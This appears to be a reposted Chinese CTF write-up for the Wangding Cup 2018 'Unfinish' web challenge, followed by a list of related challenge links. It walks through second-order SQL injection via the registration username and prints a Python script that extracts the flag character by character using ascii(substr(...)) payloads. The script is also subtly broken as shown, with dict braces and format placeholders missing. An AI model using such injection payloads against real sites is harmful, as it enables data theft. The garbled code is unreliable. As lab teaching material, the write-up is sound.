[网鼎杯2018]Unfinish

Posted F1gh4

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[网鼎杯2018]Unfinish相关的知识,希望对你有一定的参考价值。

[网鼎杯2018]Unfinish

熟悉的二次注入:
是sql注入题目:
常见的目录规则,让人想起register.php,扫描目录也扫出来了:
注册:
登录进去,搜寻信息:
用户名被显示出来,试试二次注入:
注册用户名 '1’and’0
确实存在,自己写脚本去爆吧:
注册发包的格式:(如上图)

写脚本要提取出该用户名的内容:

url =' http://e216dce0-dd95-4585-90a3-b0d9f3963582.node3.buuoj.cn/'


flag =''

url_login = url + 'login.php'
url_register = url + 'register.php'
url_index = url +'index.php'

for i in range(100):
	sleep(0.2)
	data_reg = "email":"8888@qq.com".format(i),"username":"0'+ascii(substr((select * from flag) from  for 1))+'0;".format(i), "password" : "123"
	data_log = "email" : "8888@qq.com".format(i), "password" : "123" 

	r1=requests.post(url_register,data=data_reg)
	r2=requests.post(url_login,data=data_log)
	#r3=requests.get(url_index)
	
	res = re.search(r'<span class="user-name">\\s*(\\d*)\\s*</span>',r2.text)
	res1 = re.search(r'\\d+', res.group())
	flag = flag+chr(int(res1.group()))
	print(flag)

\\s提取空格,\\d提取所有数字,\\d+则提取出第一个数字,group()只输出其数据,输出的是ASCLL码形式,转换一下在拼在一起:

以上是关于[网鼎杯2018]Unfinish的主要内容,如果未能解决你的问题,请参考以下文章

复习BUUCTF:[网鼎杯2018]Unfinish --- python爬虫 + re sql注入,substr二次注入,hex二次注入 不用bool注入点的substr

[网鼎杯 2018]Comment

[网鼎杯 2018]Fakebook

网鼎杯2018fakebook

[网鼎杯 2018]Fakebook

[网鼎杯 2018]Fakebook